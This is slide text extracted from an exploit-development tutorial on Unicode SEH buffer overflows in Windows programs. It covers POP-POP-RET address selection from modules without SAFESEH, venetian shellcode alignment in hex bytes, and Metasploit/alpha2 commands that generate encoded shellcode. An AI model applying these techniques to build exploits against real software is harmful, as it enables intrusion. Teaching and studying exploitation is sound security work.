Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
8. @ajinabraham
•
nSEH
•JMP TO SHELLCODE
We can’t use actual JMP. We will walk to shellcode
We will use single byte instructions along with some NOP
like harmless aligning instructions(Venetian Shellcode).
SEH
•POP,POP,RET SEQUENCE (The address will be of the format
0x00aa00bb)
Shellcode
•UNICODE SHELLCODE (Shellcode is Decoder + Shellcode.
So we have to point a register to the decoder and jump
to it. We use venetian shellcode technique for alignment.)
EIP
1
2
3
9. @ajinabraham
•
•
• JMP TO SHELLCODE
We can’t use actual JMP. We will walk to shellcode
We will use single byte instructions along with some NOP
like harmless aligning instructions(Venetian Shellcode).
nSEH
You need to try out
and choose the
working one.
But you can check it
only after you check
SEH
popad/inc eax or
selecting the nops
Example
“x61x41” implies 61 ->POPAD
004100 ->ADD BYTE PTR DS:[ECX],AL
“x41x71” implies 41 ->INC ECX
007100 ->ADD BYTE PTR DS:[ECX],DH
1Byte Instruction
41 : INC ECX
61 POPAD
10. @ajinabraham
SEH
•POP,POP,RET SEQUENCE (The address will be of the format
0x00aa00bb)
Selecting Suitable Address
• The Address range should
be between 0x00 and 0x7f
• Choose address from
modules without SAFESEH
• Address should be in the
format 0x00aa00bb
• Say if you choose “0x004d0041” then specify “x41x4d”(little endian) in the shellcode.
• “00” will be prepended by the program during execution.
• Even if we get suitable addresses, all of these don’t work. You have to try out each address
to find out the address that doesn’t harm the execution flow and reaches at our shellcode.
!mona seh –cp unicode Suitable Address
0x004b00cb
0x004a0041
0x004a0059
0x004d0041
0x004100f2
0x004c0020
11. @ajinabraham
• Generate the shellcode with Metasploit alone or use SkyLined’s alpha2 encoder.
msfpayload windows/exec CMD=calc R | msfencode -e x86/unicode_upper BufferRegister=EAX -t raw
msfpayload windows/exec CMD=calc R | ./alpha2 eax –unicode –uppercase
• We need to point a register to contain our shellcode and jump to it. For alignment we use venetian shellcode
technique.
• We will use EAX to contain our shellcode.
Shellcode
UNICODE SHELLCODE (Shellcode is Decoder +
Shellcode. So we have to point a register to the
decoder and jump to it. We use venetian shellcode
technique for alignment.)
Shellcode
Shellcode
Decoder
13. @ajinabraham
• You will need to properly align the set of instructions with venetian shellcode so that it won’t
break at execution time.
• You should be creative. You should analyze the execution flow in the debugger.
• At times we need to add extra venetian shellcode at the beginning and end to properly align everything.
• So for example the previous code after adding some venetian shellcode may look like this.
"x58“ pop eax # take the value of ebp and pop it to eax
"x71“ # Venetian Padding
"x05xbbxaa" add eax,0xaa00bb00 #
"x71" # Venetian Padding > Add and Subtract,(0xaa00bb00 >0xcc00dd00) will give you a positive value X, and will be added to EAX in effect.
"x2dxddxcc" sub eax,0xcc00dd00 # /
"x71" # Venetian Padding
"x50" push eax # push the new value of EAX in stack
"x71" # Venetian Padding
"xC3" ret # Return the address of shellcode in EAX to EIP for execution
• Add sufficient NOP like instruction to reach our shellcode.
• MSF Pattern can be used but better just tryout yourself manually.